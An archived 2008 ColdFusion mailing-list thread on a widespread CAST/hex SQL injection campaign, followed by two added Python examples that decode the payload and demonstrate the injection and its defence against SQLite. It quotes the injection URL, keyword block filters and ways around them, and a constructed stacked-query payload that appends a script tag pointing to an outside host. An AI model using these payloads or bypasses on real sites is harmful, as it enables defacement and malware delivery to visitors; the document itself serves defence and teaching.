ColdFusion Talk (CF-Talk)
(ot) URL Hack Attempt Leaves Me Scratching My Head
Thread index (first line of each post, with author and date):

Che Vilnonis (07/21/08 10:55 AM): Just was looking at a 'user monitor' page on one of my sites and I saw the
Mark Kruger (07/21/08 11:00 AM): This is a popular and very malicious SQL injection attack that is making the
Gerald Guido (07/21/08 11:01 AM): This is some sort of encoding... Like Bin Hex, Spammers use it to obscure
Josh Nathanson (07/21/08 12:36 PM): I am seeing these too on our site, in errors generated by bad data going
Kris Jones (07/21/08 12:55 PM): We're getting hit hard today with this. They're failing, because we
Gerald Guido (07/21/08 01:04 PM): >>We're getting hit hard today with this.
Kris Jones (07/21/08 02:00 PM): It'll show in your logs of course. We also have error reports that
Andy Matthews (07/21/08 03:41 PM): We're getting hit with this attack via a wide range of hosted domains, and
Claude Schneegans (07/21/08 03:11 PM): >>If several people on this list are seeing this attack, it must be pretty
james carberry (07/21/08 01:55 PM): >Just was looking at a 'user monitor' page on one of my sites and I saw the
james carberry (07/21/08 01:58 PM): Even easier than monkeying with every single one of your cfquery's.... just add following line to the TOP of all your application.cfm's:
Adrian Lynch (07/24/08 09:11 AM): And what about my page exec(.cfm?! :OD
james carberry (07/21/08 02:43 PM): Just put the following line at the TOP of your application.cfm to inoculate your CF webs against this attack:
Gerald Guido (07/21/08 07:52 PM): I went to look at a site I do side work for and they got hit. No... not my
Andreas Ertle (07/22/08 04:50 AM): >Just was looking at a 'user monitor' page on one of my sites and I saw the
Kris Jones (07/22/08 08:13 AM): This attack has nothing to do with elevation of privilege. It simply
Jerry Johnson (07/22/08 08:40 AM): The purpose of the hack is to change your website, so that each visitor is
Jesse Beckton (07/22/08 10:26 PM): Doooooooh!
Pete Ruckelshaus (07/25/08 09:47 PM): I just got hit by this on one of my older sites (inconsistent use of
Brad Wood (07/21/08 11:07 AM): Read this:
Brad Wood (07/21/08 11:10 AM): Why bother looking around the internet? Use your SQL server to decode
Gerald Guido (07/21/08 11:14 AM): >>Why bother looking around the internet? Use your SQL server to decode it!
Che Vilnonis (07/21/08 11:33 AM): Tried printing the code in SQL Analyzer and got nothing. Can anyone
Dave Francis (07/21/08 11:42 AM): Can we please stop distributing this script ;)
Che Vilnonis (07/21/08 11:44 AM): Good point. My bad...
Brad Wood (07/21/08 11:45 AM): Works great for me. You have to remove the extra line breaks though.
Che Vilnonis (07/21/08 11:58 AM): Yep, read the post. Must have been the line breaks that messed things up.
Andy Matthews (07/21/08 12:21 PM): Mutha!!!
Wayne Janeck (07/21/08 02:47 PM): We had the same hack on our site, did you guys figure out exactly what happened or how and where the sql was ran? or what the hackers purpose was?
Heikki Heikkinen (07/21/08 06:12 PM): Brad,
Brad Wood (07/21/08 11:50 AM): I appreciate your concern, but I'm pretty certain the bad people out
Gerald Guido (07/21/08 12:16 PM): >>Drop database foo
Brad Wood (07/21/08 01:10 PM): Good on ya, mate. If there were an award for using cfqueryparam I would
Joshua Cyr (07/21/08 01:11 PM): I was just looking into that myself.
Matthew Smith (07/24/08 03:05 PM): >I was just looking into that myself.
Che Vilnonis (07/21/08 01:14 PM): +1
Brad Wood (07/21/08 01:15 PM): Sweet nectar... I'm trying this out and blogging it tonight. If it's
Dave Watts (07/21/08 02:02 PM): > Even easier than monkeying with every single one of your
Andy Matthews (07/21/08 03:36 PM): Dave...
Claude Schneegans (07/21/08 03:44 PM): >>What other ways are there? I know of two: EXEC and EXECUTE
Andy Matthews (07/21/08 03:50 PM): I'm just talking about executing SQL, not SQL injection methods.
Brad Wood (07/21/08 02:02 PM): Band-Aids and duct tape...
Brad Wood (07/21/08 02:53 PM): The hacker's hope is that you will be outputting one of those varchar
Andy Matthews (07/21/08 03:40 PM): Just an FYI...
Mark Kruger (07/21/08 03:44 PM): And embedded in his code is one of the "other" ways of executing SQL - using
Che Vilnonis (07/21/08 04:06 PM): For me, all attempts are focusing on rss.cfm. Another post said they saw
Mark Atkinson (07/21/08 04:17 PM): We've been dealing with these too - to address Che's question they were
Jerry Johnson (07/21/08 04:17 PM): The attempts are based on a google search of .cfm files with parameters that
Cameron Johnson (07/21/08 04:23 PM): We got hit, and, according to the IIS logs, they hit non-standard templates in varied directories:
Kris Jones (07/21/08 04:28 PM): I can confirm that many templates in our site are being hit. And they
Dave Watts (07/21/08 03:03 PM): > The hacker's hope is that you will be outputting one of those
Mark Kruger (07/21/08 03:33 PM): For those of you who have been hit by this attack and who need to try
Heikki Heikkinen (07/21/08 05:22 PM): Mark,
Al Musella, DPM (07/23/08 06:18 PM): One of my websites got hit.. I always use
Brad Wood (07/23/08 06:24 PM): however, one of the owners got banned when
Claude Schneegans (07/24/08 09:09 AM): >>This is a classic reason why that sort of blocking method
Andy Matthews (07/24/08 09:18 AM): I'd be leery of simply looking for the word cast, or declare, or exec by
Robert Harrison (07/24/08 09:47 AM): Add one to the list. One of my old sites just got brought down. We restored
Martin Schmelzle (07/23/08 03:43 PM): Hi Dave,
Brad Wood (07/21/08 03:11 PM): For what it's worth, the specific URL that was injected in the sample I
Claude Schneegans (07/21/08 03:27 PM): >>For what it's worth, the specific URL that was injected in the sample I
Andy Matthews (07/21/08 03:41 PM): I took the time to save out all of the code from the JS file that was
Jerry Johnson (07/21/08 04:14 PM): I have all of the js files open and saved to a text file, fwiw, from this
Mark Kruger (07/21/08 03:42 PM): Brad/dave,
Dave Watts (07/21/08 03:28 PM): > Until now, I just check for strings "http" or "user" in
Claude Schneegans (07/21/08 03:42 PM): >>That's fine, until the attack pattern contains something else, like
Bryan Stevenson (07/21/08 04:04 PM): ....and all hackers ALWAYS use the same IP....cause they'd never get
Claude Schneegans (07/21/08 04:41 PM): >>.....and all hackers ALWAYS use the same IP....cause they'd never get
Bryan Stevenson (07/21/08 06:18 PM): Ahhh...so there were other reasons for doing what you are doing....that
Claude Schneegans (07/21/08 09:13 PM): >>....and no...not retarded....just tactless
Claude Schneegans (07/21/08 09:50 PM): >>I too was concerned about your solution being
Brad Wood (07/21/08 04:07 PM): Easy. sp_executesql
Dave Watts (07/21/08 04:30 PM): > Yeah, that suck, I was going to dissect it. It appears that
Che Vilnonis (07/21/08 04:40 PM): Here's another question. Are sites that rewrite URLs (i.e., no .cfm
Andy Matthews (07/22/08 09:08 AM): No, because those sites are still using the URL variables, just not visibly.
Gerald Guido (07/22/08 09:25 AM): I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper for
Rick Faircloth (07/22/08 09:48 AM): Let me just jump in with a quick question or two about this...
Dave Watts (07/21/08 04:37 PM): > Not from the same address though, because it is banned now.
Claude Schneegans (07/21/08 04:56 PM): >>This appears to be a botnet-driven attack. Blocking addresses may be
Matt Quackenbush (07/21/08 05:24 PM): Did I really just read that? Please, someone, anyone, tell me that I
Experienced CF Developer (07/21/08 05:34 PM): And for those of you who take this advice and DO use cfqueryparam
Adrian Lynch (07/24/08 09:38 AM): Dear Dave Phillips, you have made a generalisation and I have a dissenting
Dave Phillips (07/24/08 10:09 AM): Adrian,
Claude Schneegans (07/24/08 10:55 AM): >>In our case, what
Jim Wright (07/24/08 11:12 AM): On Thu, Jul 24, 2008 at 10:52 AM, Claude Schneegans <
Claude Schneegans (07/24/08 11:24 AM): >>It shouldn't make a difference if the SELECT * is in a cfquery
James Holmes (07/24/08 11:40 AM): This is not the only case. If you use pooled statements on the
Jim Wright (07/24/08 02:22 PM): On Thu, Jul 24, 2008 at 11:20 AM, Claude Schneegans <
Kris Jones (07/21/08 06:21 PM): As a rule I use cfqueryparam. And generally try to stick to stored
Claude Schneegans (07/21/08 09:40 PM): >>Bottom line: ***always*** use cfqueryparam. Period. There are no
Mark Kruger (07/21/08 10:07 PM): Regarding performance... On high traffic sites with a good SQL server
Gerald Guido (07/21/08 10:28 PM): Always sanitize your data entry.
Mary Jo Sminkey (07/23/08 11:18 AM): >Not dissing anyone. Just curious. With all the ORM's and code generators out
Adrian Lynch (07/24/08 09:42 AM): Ok, I understand why you think it's ridiculous, but here's a reason to do
Claude Schneegans (07/24/08 09:57 AM): >>and Billy New-Developer comes along and decides that
Adrian Lynch (07/24/08 10:13 AM): But Billy has been told to turn:
Claude Schneegans (07/24/08 10:46 AM): >>But Billy has been told to turn:
James Holmes (07/24/08 10:14 AM): Do you fully understand what cfqueryparam does when binding text
Claude Schneegans (07/24/08 11:01 AM): >>Do you fully understand what cfqueryparam does when binding text
Adrian Lynch (07/24/08 11:11 AM): Try telling that to Billy, he just got fired!
James Holmes (07/24/08 11:43 AM): So you know that it *always* prevents SQL injection in a standard
Claude Schneegans (07/24/08 11:48 AM): >>So you know that it *always* prevents SQL injection in a standard
James Holmes (07/24/08 11:59 AM): I'll say it again.
James Holmes (07/24/08 12:00 PM): Obviously cfsqltype="varchar" should be cfsqltype="cf_sql_varchar" (my typo).
James Holmes (07/24/08 12:08 PM): Jeez, and value="URL.TryToHackThis" should be value="#URL.TryToHackThis#"
Claude Schneegans (07/24/08 12:18 PM): >>Jeez, and value="URL.TryToHackThis" should be value="#URL.TryToHackThis#"
Claude Schneegans (07/24/08 12:17 PM): >>ANY string passed into cfqueryparam cannot be executed as SQL:
Brad Wood (07/24/08 12:26 PM): Closing the apostrophe is exactly how SQL injection occurs with text field
Claude Schneegans (07/24/08 12:36 PM): >>Closing the apostrophe is exactly how SQL injection occurs with text
Brad Wood (07/24/08 12:42 PM): Not if you use MySQL. That DBMS allows for an alternative way to escape
Claude Schneegans (07/24/08 01:02 PM): >>Not if you use MySQL. That DBMS allows for an alternative way to escape
Brad Wood (07/24/08 01:46 PM): That's fair enough from a security stand point, but I still use cfqueryparam
Claude Schneegans (07/24/08 01:54 PM): >>When your database executes a SQL statement, it generates an
Claude Schneegans (07/21/08 10:01 PM): >>For those of you who are actually trying to learn and become better
Dave Watts (07/21/08 04:40 PM): > What other ways are there? I know of two: EXEC and EXECUTE.
Dave Watts (07/21/08 05:25 PM): > Why do you all want to interpret this as a final solution?
Brad Wood (07/21/08 06:24 PM): Hmm, I sure hope you replaced the exec with a print statement....
Brad Wood (07/21/08 06:26 PM): Cache result sets manually. You can wrap that up nicely in a custom
Dave Watts (07/21/08 08:06 PM): > We are going to be reading about this on all the tech rags
Dan Vega (07/21/08 08:33 PM): Firewall solution is another way, we block anything in the url with CAST( OR
Brad Wood (07/23/08 07:51 PM): If you are still being affected by the attack, then you still have one or
Radek Valachovic (07/23/08 08:33 PM): What about if I put:
Mark Kruger (07/23/08 09:52 PM): Excuse me... But why are you checking script_name and Path_info for "EXEC("
Gabriel (07/23/08 10:53 PM): With this latest spate of SQL attacks it has at least alerted CF (and non CF
Mark Kruger (07/23/08 11:17 PM): Gabriel,
Gabriel (07/24/08 12:19 AM): Mark,
Brad Wood (07/24/08 12:34 AM): Thanks for that link Gabriel. I'm sure it was intended for black hats, but
Mark Kruger (07/24/08 08:56 AM): Gabriel,
Claude Schneegans (07/24/08 09:16 AM): >>var listSQLInject =
Radek Valachovic (07/24/08 01:15 PM): Do you think when I am using cfqueryparams for example with numbers like
Brad Wood (07/24/08 01:39 PM): Radek, what you did is exactly correct. (Well, some people might bust your
Radek Valachovic (07/24/08 01:52 PM): Yeah I was reading in the forum this one, that using SELECT * is not good,
Charlie Griefer (07/24/08 02:03 PM): On Thu, Jul 24, 2008 at 10:48 AM, Radek Valachovic <rentgeeen@gmail.com>
Radek Valachovic (07/24/08 02:22 PM): What would you suggest for this kind of thing:
Adrian Lynch (07/24/08 02:25 PM): Whatever the length of the column in your DB.
Radek Valachovic (07/24/08 02:59 PM): Okay what about this, for example column name ITEMOID has in DB maxlength 15
Radek Valachovic (07/24/08 03:04 PM): Correction sql should be in the text:
Cutter (CFRelated) (07/24/08 03:09 PM): Radek,
Brad Wood (07/24/08 02:26 PM): Your max length in this scenario should most likely be the size of the
Ben Forta (07/24/08 02:26 PM): MAXLENGTH would typically be the maximum the underlying table allows or the
Radek Valachovic (07/24/08 02:30 PM): So if I won't use maxlength still it is gonna be secured? thanks
Brad Wood (07/24/08 02:34 PM): Absolutely. Minimally, just using a cfqueryparam tag with the value
Bryan Hogan (07/24/08 02:36 PM): It will be secured, but it is better IMO to use the maxlength attribute.
Ian Skinner (07/24/08 02:31 PM): Charlie Griefer wrote:
Brad Wood (07/24/08 02:52 PM): What Charlie says is correct. To elaborate on the performance part..
Mark Kruger (07/24/08 01:40 PM): Using CFQUERYPARAM will secure your DB calls. That doesn't mean you don't
Mark Kruger (07/24/08 01:53 PM): Second to last sentence should read .... "you are safe from damage to the
Al Musella, DPM (07/23/08 09:53 PM): That may help with this particular attack, but I already have seen 2
Mark Kruger (07/23/08 10:02 PM): Good list al - but I have a couple of revisions for you :)
Al Musella, DPM (07/23/08 11:42 PM): My thinking is:
Claude Schneegans (07/24/08 09:22 AM): >>Keywords and banning IPs by themselves are not the answer
Jochem van Dieten (07/24/08 03:13 PM): Al Musella, DPM wrote:
Al Musella, DPM (07/25/08 06:40 PM): I won't mention names but a few popular websites I use have been
Andy Matthews (07/24/08 09:22 AM): What if the hacker puts a space between EXEC and the (?
Dave Watts (07/24/08 02:00 PM): > Ok, this is another example where CFQP is useful, as the doc says.
Claude Schneegans (07/24/08 02:06 PM): >>If you don't really care
Dave Watts (07/24/08 02:05 PM): > A very particular situation though. It will not prevent me
Claude Schneegans (07/24/08 02:16 PM): >>it's safe to say that avoiding "*" is a good idea,
Ben Forta (07/24/08 02:18 PM): Fine, it's always a good idea to never use *
Brad Wood (07/24/08 02:23 PM): This is starting to sound like a bad multiple choice question from a college
Dave Phillips (07/24/08 02:36 PM): (Brad) >>This is starting to sound like a bad multiple choice question from
Ian Skinner (07/24/08 03:03 PM): Dave Phillips wrote:
Dave Watts (07/24/08 02:07 PM): > It may be a silly question, but why a SELECT * will break
Dave Watts (07/24/08 02:31 PM): > So if I won't use maxlength still it is gonna be secured?
Radek Valachovic (07/25/08 07:29 PM): Interesting question:
Dave Watts (07/24/08 02:36 PM): > > If you don't really care
Dave Watts (07/24/08 03:04 PM): > How can it be processed when USER_ID in database is
Radek Valachovic (07/24/08 03:09 PM): Great, yes understand, basically it runs another script against database so
Radek Valachovic (07/24/08 03:12 PM): I noticed since I started securing the site also with the cfif EXEC, I have
Dave Watts (07/24/08 03:37 PM): > If I do find any vulnerabilities, is there something I can run
Radek Valachovic (07/24/08 03:40 PM): Yes Exactly, Run the current attack, I am doing it to see how am I securing
Al Musella, DPM (07/25/08 06:55 PM): I set up a scheduled task to check my database every 15 minutes. It
Dave Watts (07/26/08 12:49 AM): > Interesting question:

Messages:

Che Vilnonis (07/21/08 10:55 AM):
Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Everything is cfqueryparam'ed. Thanks, Che
/rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x... [hex payload cut in this copy]

Mark Kruger (07/21/08 11:00 AM):
This is a popular and very malicious SQL injection attack that is making the rounds: http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII
-Mark
Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com
----- Excess quoted text cut - see Original Post for more -----

Gerald Guido (07/21/08 11:01 AM):
This is some sort of encoding... Like Bin Hex, Spammers use it to obscure urls and such. Computers read it just fine. If you look around on the internets you can find a decoder to render it to human readable form. You just need to figure out what sort of encoding they are using
----- Excess quoted text cut - see Original Post for more -----

Josh Nathanson (07/21/08 12:36 PM):
I am seeing these too on our site, in errors generated by bad data going into a cfqueryparam. If several people on this list are seeing this attack, it must be pretty widespread.
-- Josh
----- Excess quoted text cut - see Original Post for more -----

Kris Jones (07/21/08 12:55 PM):
We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying.
-KJ

Gerald Guido (07/21/08 01:04 PM):
>>We're getting hit hard today with this.
>>/rss.cfm?
Is it just rss.cfm? I haven't looked at our logs yet. Where did you see this? The server log files?
~~G~~
> We're getting hit hard today with this. They're failing, because we
> use cfqueryparam and cfprocparam. But it is quite annoying.
>
> -KJ

Kris Jones (07/21/08 02:00 PM):
It'll show in your logs of course. We also have error reports that dump the error info and certain collections and mail it to the dev team.
-KJ
----- Excess quoted text cut - see Original Post for more -----

Andy Matthews (07/21/08 03:41 PM):
We're getting hit with this attack via a wide range of hosted domains, and various files. Sitemap.cfm is a common one at this point.
andy
----- Excess quoted text cut - see Original Post for more -----

Claude Schneegans (07/21/08 03:11 PM):
>>If several people on this list are seeing this attack, it must be pretty widespread.
Until now, I just check for strings "http" or "user" in url.id containing something else than an integer value. I now just added "DECLARE" in the validation. All my templates expecting id=<some numeric> start with this code (included):
<CFIF val(id) EQ 0 AND (id CONTAINS "http" OR id CONTAINS "user" OR id CONTAINS "DECLARE")>
... save IP of this guy in the banned addresses table...
</CFIF>
This is even more efficient than CFQUERYPARAM, because this way I'm sure the guy will not have another chance.
--
_______________________________________
REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com) Thanks.
----- Excess quoted text cut - see Original Post for more -----

james carberry (07/21/08 01:55 PM):
>CHAR(4000));EXEC(@S);
Even easier than monkeying with every single one of your cfquery's.... just add following line to the TOP of all your application.cfm's:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
This will immediately shut down execution of any CFM that this piece of trash tries to invoke to execute this particular type of SQL for.
peace, j
----- Excess quoted text cut - see Original Post for more -----

Adrian Lynch (07/24/08 09:11 AM):
And what about my page exec(.cfm?! :OD
Just checking my logs now and I'm getting hit by this too. cfqp'd all the way though...
----- Excess quoted text cut - see Original Post for more -----

james carberry (07/21/08 02:43 PM):
Just put the following line at the TOP of your application.cfm to inoculate your CF webs against this attack:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
peace, j
----- Excess quoted text cut - see Original Post for more -----

Gerald Guido (07/21/08 07:52 PM):
I went to look at a site I do side work for and they got hit. No... not my stuff. :)
We are going to be reading about this on all the tech rags like Info World and Zdnet tomorrow. ZDnet will prolly post it with a H1 tag with a blink tag for good measure.
One of the things about SQL server I never liked was how you could run more than one sql script at a time. Mysql doesn't allow you to do this LTIL.
cfqueryparam... me love you long time.
~G~
"If everything seems under control, you're not going fast enough" -- Mario Andretti

Andreas Ertle (07/22/08 04:50 AM):
>Just was looking at a 'user monitor' page on one of my sites and I saw the
>url string below being called. I've seen several sql injection urls before,
>but what the heck are they trying to accomplish here? Everything is
>cfqueryparam'ed. Thanks, Che
>
>/rss.cfm?';DECLARE @S CHAR(4000);SET
>@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
Hello, naive question maybe, nevertheless: Can someone confirm that having applied the Microsoft patch(es) mentioned on http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx is sufficient to protect against attacks like these? Who had applied the patch(es) but still was attacked and infected successfully?

Kris Jones (07/22/08 08:13 AM):
This attack has nothing to do with elevation of privilege. It simply tacks on a SQL procedure to a query existing on the page already. This procedure then runs through the tables/columns in the database appending text to the end of content in varchar fields. The text appended varies, but what I've seen is a javascript file call, that would run when the affected content was displayed in a browser. I can't see how that security patch would have anything to do with it. (Please enlighten me if I'm wrong.)
> Can someone confirm that having applied the Microsoft patch(es) mentioned on
> ht
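The first question in the thread is what the hex inside CAST(...) actually is (Gerald Guido points at a decoder, Brad Wood's branch of the thread decodes it in SQL Server itself), and the later branches worry that matching "EXEC(" in application.cfm is both noisy (Andy Matthews: "I'd be leery of simply looking for the word cast, or declare, or exec") and trivially sidestepped ("What if the hacker puts a space between EXEC and the (?"). The following is an added example, not code from the thread or from any of its posters. It decodes the hex prefix that survives in the quoted original post and flags the DECLARE/CAST-hex/EXEC chain after undoing the obfuscations a plain substring check never sees (URL encoding, inline comments, whitespace before the parenthesis). Only the hex prefix is taken from the page; the sample request strings and all function names are constructed here.

```python
"""Decode the CAST(0x...) payload quoted in the thread and flag its variants.

Added example, not code from the CF-Talk thread. The only attacker bytes used
are the hex prefix quoted in the original post (truncated by the list
archive); the sample request strings below are constructed.
"""
import binascii
import re
from urllib.parse import unquote_plus

# Hex prefix exactly as it appears in the quoted original post.
THREAD_HEX_PREFIX = "4445434C415245204054207661726368617228323535292C404320766172636861"

_HEX_LITERAL = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)", re.I)
_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def decode_cast_hex(hex_literal: str) -> str:
    """Turn the 0x... literal that CAST(... AS CHAR) receives back into SQL text."""
    digits = hex_literal.strip()
    if digits[:2].lower() == "0x":
        digits = digits[2:]
    if len(digits) % 2:            # literal cut mid-byte by the archive
        digits = digits[:-1]
    # SQL Server CASTs the bytes as CHAR, one byte per character.
    return binascii.unhexlify(digits).decode("latin-1")


def normalise(query_string: str) -> str:
    """Undo the tricks that beat a substring match on "EXEC(".

    Repeated URL-decoding (double-encoded input), comment stripping and
    whitespace folding, so "EXEC (", "exec%28", "EXEC/**/(" and "E%2558EC("
    all end up as "exec(".
    """
    s = query_string
    for _ in range(3):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = _COMMENT.sub("", s)
    s = re.sub(r"\s+", " ", s)
    s = re.sub(r"\s*\(", "(", s)   # "EXEC (" -> "EXEC("
    return s.lower()


def extract_cast_payloads(query_string: str) -> list:
    """Decode every CAST(0x...) literal found in a request's query string."""
    return [decode_cast_hex(m.group(1)) for m in _HEX_LITERAL.finditer(normalise(query_string))]


def looks_like_cast_injection(query_string: str) -> bool:
    """Flag the DECLARE / CAST-hex / EXEC chain rather than the bare words.

    A hex literal handed to CAST is enough on its own. Otherwise both a
    DECLARE of a variable and a dynamic-SQL call are required, so a search
    for "exec summary" or "cast members" is not a hit.
    """
    s = normalise(query_string)
    hex_cast = re.search(r"cast\(0x[0-9a-f]{8,}", s) is not None
    declares = re.search(r"\bdeclare @\w+", s) is not None
    dynamic_sql = re.search(r"\bexec(?:ute)?\(|\bsp_executesql\b", s) is not None
    return hex_cast or (declares and dynamic_sql)


# Constructed sample requests. The first mirrors the shape of the URL in the
# thread; the second is the same attack with a space before the parenthesis
# and URL-encoded, which the application.cfm "EXEC(" check lets through.
SAMPLES = {
    "thread_shape": "/rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x"
                    + THREAD_HEX_PREFIX + " AS CHAR(4000));EXEC(@S);--",
    "spaced_and_encoded": "/sitemap.cfm?id=7%3BDECLARE%20%40S%20CHAR(4000)%3BSET%20%40S%3DCAST(0x"
                          + THREAD_HEX_PREFIX + "%20AS%20CHAR(4000))%3BEXEC%20(%40S)",
    "benign_words": "/search.cfm?q=exec+summary+of+the+cast+members",
    "benign_id": "/rss.cfm?id=12",
}

if __name__ == "__main__":
    print(decode_cast_hex("0x" + THREAD_HEX_PREFIX))
    for name, url in SAMPLES.items():
        print(name, looks_like_cast_injection(url), extract_cast_payloads(url))
```

Decoding the prefix from the page gives "DECLARE @T varchar(255),@C varcha": the start of the cursor declaration that, as Kris Jones describes, walks table and column names. The point of normalise() is that a request-level check must operate on the decoded, folded text; a check on the raw query string, as in the application.cfm one-liner, is defeated by a single space or percent-escape.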
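Kris Jones's description above is the whole mechanism: a second statement is tacked onto the page's existing query, and that statement appends a script tag to varchar content that the site later renders. It is also why the posters who use cfqueryparam see only errors. The following is an added example, not code from the thread or from any of its posters. SQLite stands in for the SQL Server behind the affected sites, and executescript() is used on the vulnerable path to model SQL Server running a batch of stacked statements (the behaviour Gerald Guido complains about). It runs a constructed payload of the same shape through an unparameterised query and through a bound one, and shows that the application.cfm "EXEC(" check never sees this payload at all. The table, rows, script URL and function names are all constructed here.

```python
"""Why binding (cfqueryparam) stops the attack and an "EXEC(" filter does not.

Added example, not code from the CF-Talk thread. SQLite stands in for SQL
Server; executescript() on the vulnerable path models SQL Server executing
a batch of stacked statements. Table, rows and the injected tag are
constructed; the tag is a placeholder, not the URL the attack injected.
"""
import sqlite3

INJECTED_TAG = '<script src="http://example.invalid/x.js"></script>'

# The thread describes the decoded payload walking every table and varchar
# column and appending a script tag. This stand-in does the same to one
# known table, and contains no "EXEC(" for a keyword filter to catch.
PAYLOAD = "'; UPDATE articles SET body = body || '" + INJECTED_TAG + "'; --"


def fresh_db() -> sqlite3.Connection:
    """A throwaway database holding two rows of content a page would render."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "INSERT INTO articles VALUES (1, 'Hello', 'first post');"
        "INSERT INTO articles VALUES (2, 'World', 'second post');"
    )
    return conn


def article_bodies(conn) -> list:
    """What the site would render after the request has been processed."""
    return [row[0] for row in conn.execute("SELECT body FROM articles ORDER BY id")]


def rss_vulnerable(conn, url_id: str) -> list:
    """A <cfquery> that pastes #url.id# straight into the SQL text.

    The batch is run the way SQL Server runs it: the attacker's second
    statement executes with the application's database rights. Returns the
    stored bodies afterwards so the damage is visible.
    """
    sql = "SELECT id, title, body FROM articles WHERE id = '" + url_id + "'"
    conn.executescript(sql)
    return article_bodies(conn)


def rss_parameterised(conn, url_id: str) -> list:
    """The <cfqueryparam> equivalent: the value is bound, so it is data, never SQL."""
    return conn.execute(
        "SELECT id, title, body FROM articles WHERE id = ?", (url_id,)
    ).fetchall()


def naive_exec_filter(query_string: str) -> bool:
    """The application.cfm check proposed in the thread: it only sees 'EXEC('."""
    return "EXEC(" in query_string.upper()


if __name__ == "__main__":
    db = fresh_db()
    print("filter caught it:", naive_exec_filter(PAYLOAD))
    print("vulnerable     :", rss_vulnerable(db, PAYLOAD))
    db = fresh_db()
    print("parameterised  :", rss_parameterised(db, PAYLOAD), article_bodies(db))
```

With the unparameterised query every stored body comes back with the script tag appended, which is exactly the symptom the posters are cleaning up; with the bound parameter the same input matches no row and the table is untouched. The keyword filter returns False for this payload because there is nothing to stack a variable declaration or EXEC around once the attacker already has a second statement; the thread's own consensus, bind every value, is the only one of the three that holds for all payload shapes.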